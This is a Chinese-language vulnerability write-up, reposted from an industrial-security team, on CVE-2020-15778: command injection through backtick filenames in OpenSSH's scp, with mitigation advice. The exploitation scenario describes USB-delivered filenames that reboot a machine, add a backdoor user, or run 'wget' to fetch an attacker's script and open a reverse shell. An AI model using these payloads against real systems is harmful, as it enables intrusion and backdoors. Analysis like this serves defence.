前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2020-15778 SSH漏洞复现分析

CVE-2020-15778 SSH漏洞复现分析

作者头像
IRTeam-工业安全
发布2022-05-10 20:32:11
1K0
发布2022-05-10 20:32:11
举报
文章被收录于专栏:今天有没有多懂一点工业安全

在众多的工业路由器和部分控制器内,采用了OpenSSH来做外部连接和管理。2020年7月9日被国外安全研究员ChinmayPandya发现OpenSSH 8.3 p1及之前版本中SCP命令里存在命令注入漏洞。

上面为https://github.com/openssh/openssh-portable/blob/master/scp.c的代码,989行则是漏洞触发所在。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾。例如,如果执行以下命令:

scp SourceFileuser@host:directory/TargetFile

它将执行一个本地命令:

scp-t directory/TargetFile

在创建本地scp命令时,它没有清理文件名。攻击者可以采用反引号(`)文件作为命令注入。而linux系统是可以接受以反引号(`)为文件命名方式。如果你尝试把payload放在反引号中作为文件名,当调用scp命令时就会触发这个指令的执行。

漏洞利用场景:

攻击者可以采用U盘伪装成设备固件或者某种工具,在U盘中创建深度子目录,某一个目录中一个文件可以命名为`payload`,比如`reboot`。当受害者拷贝U盘目录及文件的时候采用scp -r \文件夹 RemoteIP:\文件夹 这条命令的时候,就会触发受害者的机器重启,同理如果你采用反引号+useradd这样的文件名,就可以直接在受害者机器上开启后门。当然变态一点的红队利用,就是在VPS上假设FTP放入反弹shell脚本,然后利用反引号(`)结合wget http:// vps:port/xxx.sh | sh ./xxx.sh 作为文件名,触发受害者反弹shell到VPS上。

对于远程命令的执行,还是需要bypass authorized_keys,所以远程被利用几率比较小。以下这段PoC视频,只是给大家演示一下,是可以存在远程执行命令的可能性,但是前提是要bypass authorized_keys否则,你还是需要知道

password的。

视频演示:http://mpvideo.qpic.cn/0bf2pyaggaaabeahhgjgcrpva7wdmn7aayya.f10002.mp4?

防护解决方案

截止到现在openssh的github并没有修补这个漏洞,禁用scp -r 整体目录拷贝方式,采用tar压缩目录为单一文件后,scp上传到远端机器后,再ssh远端机器解压目录。

参考:https://github.com/cpandya2909/CVE-2020-15778

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-08-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 IRT工业安全红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档